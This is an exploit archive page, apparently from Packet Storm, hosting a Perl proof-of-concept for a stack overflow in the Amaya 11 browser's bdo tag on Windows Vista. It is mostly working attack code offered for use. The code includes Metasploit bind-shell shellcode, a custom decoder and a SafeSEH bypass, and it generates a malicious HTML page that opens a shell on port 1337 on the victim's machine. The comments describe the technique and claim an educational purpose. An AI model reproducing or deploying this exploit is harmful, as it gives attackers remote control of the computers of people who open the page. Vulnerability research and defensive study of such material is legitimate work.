exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Amaya Web Browser 11 Overflow For Vista

Amaya Web Browser 11 Overflow For Vista
Posted Feb 4, 2009
Authored by Rob Carter

Amaya 11 remote stack overflow exploit for Windows Vista that makes use of the bdo tag.

tags | exploit, remote, overflow
systems | windows
SHA-256 | e2a2d533c2ccd8fa575f2f8d933e131e2dc3f30b3543574bb3fb034ec5394986

Amaya Web Browser 11 Overflow For Vista

Change Mirror Download
#!/usr/bin/perl

#############################################
#
# Amaya 11 bdo tag stack overflow
#
# author: Rob Carter (cartrel@hotmail.com)
#
# targets: windows vista sp1
#
# modified the alpha-numeric shell-code
# from metasploit since the first 12 bytes
# didn't fall within the ASCII range of
# 0x01-0x7f. otherwise my payload would
# have been corrupted on the stack. wrote
# a 47-byte decoder to repair the shell-
# code to its original state.
#
# this exploit bypasses safeSEH by jumping
# to a pop pop push pop ret sequence in
# one of the amaya modules that has a
# constant base address in memory. ret's
# back to the stack, short jump over the
# overwritten SEH, decodes the first 12
# bytes of the shellcode and then runs
# the repaired shellcode to bind a shell
# on port 1337.
#
# $ perl amaya_sploit.pl > pwn.html
#
# the author is not responsible for any misuse of
# this code. it is intended for educational
# purposes only
#
#############################################

# win32_bind - EXITFUNC=seh LPORT=1337 Size=709 Encoder=PexAlphaNum http://metasploit.com
my $shellcode =
# original first 12 bytes of shellcode:
# "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49".
"\x7f\x01\x01\x7f\x03\x68\x78\x70\x6f\x6f\x3d\x37".
"\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e".
"\x4d\x34\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x56\x4b\x48".
"\x4e\x46\x46\x42\x46\x42\x4b\x58\x45\x44\x4e\x33\x4b\x38\x4e\x47".
"\x45\x50\x4a\x47\x41\x50\x4f\x4e\x4b\x48\x4f\x34\x4a\x41\x4b\x38".
"\x4f\x45\x42\x32\x41\x30\x4b\x4e\x49\x44\x4b\x48\x46\x53\x4b\x58".
"\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x39\x4e\x4a\x46\x58\x42\x4c".
"\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e".
"\x46\x4f\x4b\x33\x46\x55\x46\x32\x4a\x52\x45\x37\x45\x4e\x4b\x48".
"\x4f\x55\x46\x42\x41\x50\x4b\x4e\x48\x46\x4b\x38\x4e\x30\x4b\x54".
"\x4b\x48\x4f\x35\x4e\x41\x41\x30\x4b\x4e\x43\x50\x4e\x32\x4b\x48".
"\x49\x48\x4e\x36\x46\x52\x4e\x31\x41\x56\x43\x4c\x41\x53\x4b\x4d".
"\x46\x56\x4b\x48\x43\x54\x42\x53\x4b\x58\x42\x44\x4e\x30\x4b\x48".
"\x42\x37\x4e\x41\x4d\x4a\x4b\x48\x42\x54\x4a\x30\x50\x45\x4a\x56".
"\x50\x38\x50\x54\x50\x50\x4e\x4e\x42\x55\x4f\x4f\x48\x4d\x48\x36".
"\x43\x35\x48\x36\x4a\x46\x43\x43\x44\x43\x4a\x46\x47\x37\x43\x47".
"\x44\x33\x4f\x55\x46\x35\x4f\x4f\x42\x4d\x4a\x36\x4b\x4c\x4d\x4e".
"\x4e\x4f\x4b\x33\x42\x45\x4f\x4f\x48\x4d\x4f\x35\x49\x38\x45\x4e".
"\x48\x46\x41\x58\x4d\x4e\x4a\x30\x44\x30\x45\x55\x4c\x36\x44\x50".
"\x4f\x4f\x42\x4d\x4a\x46\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x35".
"\x4f\x4f\x48\x4d\x43\x35\x43\x45\x43\x45\x43\x35\x43\x55\x43\x54".
"\x43\x45\x43\x34\x43\x35\x4f\x4f\x42\x4d\x48\x46\x4a\x56\x45\x30".
"\x49\x43\x48\x36\x43\x45\x49\x48\x41\x4e\x45\x59\x4a\x36\x46\x4a".
"\x4c\x51\x42\x57\x47\x4c\x47\x35\x4f\x4f\x48\x4d\x4c\x56\x42\x41".
"\x41\x45\x45\x55\x4f\x4f\x42\x4d\x4a\x36\x46\x4a\x4d\x4a\x50\x32".
"\x49\x4e\x47\x55\x4f\x4f\x48\x4d\x43\x45\x45\x35\x4f\x4f\x42\x4d".
"\x4a\x36\x45\x4e\x49\x44\x48\x48\x49\x44\x47\x55\x4f\x4f\x48\x4d".
"\x42\x55\x46\x45\x46\x35\x45\x35\x4f\x4f\x42\x4d\x43\x39\x4a\x36".
"\x47\x4e\x49\x37\x48\x4c\x49\x37\x47\x45\x4f\x4f\x48\x4d\x45\x55".
"\x4f\x4f\x42\x4d\x48\x46\x4c\x36\x46\x46\x48\x56\x4a\x36\x43\x56".
"\x4d\x56\x49\x38\x45\x4e\x4c\x56\x42\x55\x49\x35\x49\x52\x4e\x4c".
"\x49\x48\x47\x4e\x4c\x56\x46\x34\x49\x58\x44\x4e\x41\x53\x42\x4c".
"\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x32\x50\x4f\x44\x34\x4e\x32".
"\x43\x49\x4d\x48\x4c\x57\x4a\x43\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x56".
"\x44\x37\x50\x4f\x43\x4b\x48\x31\x4f\x4f\x45\x47\x46\x54\x4f\x4f".
"\x48\x4d\x4b\x45\x47\x45\x44\x55\x41\x35\x41\x35\x41\x45\x4c\x56".
"\x41\x50\x41\x45\x41\x55\x45\x55\x41\x45\x4f\x4f\x42\x4d\x4a\x56".
"\x4d\x4a\x49\x4d\x45\x50\x50\x4c\x43\x45\x4f\x4f\x48\x4d\x4c\x56".
"\x4f\x4f\x4f\x4f\x47\x53\x4f\x4f\x42\x4d\x4b\x38\x47\x45\x4e\x4f".
"\x43\x38\x46\x4c\x46\x36\x4f\x4f\x48\x4d\x44\x55\x4f\x4f\x42\x4d".
"\x4a\x46\x42\x4f\x4c\x48\x46\x50\x4f\x45\x43\x45\x4f\x4f\x48\x4d".
"\x4f\x4f\x42\x4d\x5a";

$decoder =
"\x5b". # pop ebx
"\x5b". # pop ebx
"\x68\x6c\x02\x58\x6c". # push 0x6c58026c
"\x58". # pop eax
"\x01\x43\x38". # add dword ptr[ebx+38],eax
"\x68\x01\x01\x01\x10". # push 0x10010101
"\x58". # pop eax
"\x01\x43\x3c". # add dword ptr[ebx+3c],eax
"\x68\x01\x7f\x7f\x7f". # push 0x7f7f7f01
"\x58". # pop eax
"\x01\x43\x3c". # add dword ptr[ebx+3c],eax
"\x68\x11\x11\x01\x01". # push 0x01011111
"\x58". # pop eax
"\x01\x43\x40". # add dword ptr[ebx+40],eax
"\x68\x7f\x7f\x11\x11". # push 0x11117f7f
"\x58". # pop eax
"\x01\x43\x40"; # add dword ptr[ebx+40],eax

$payload =
"<bdo dir=\"".
"A" x 6905 .
"\x74\x06\x41\x41".
"\x51\x55\x03\x10". # pop - pop - push - pop - ret 0c
$decoder.
"A".
$shellcode.
"\">pwnd!</bdo>";

print $payload;


Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    0 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close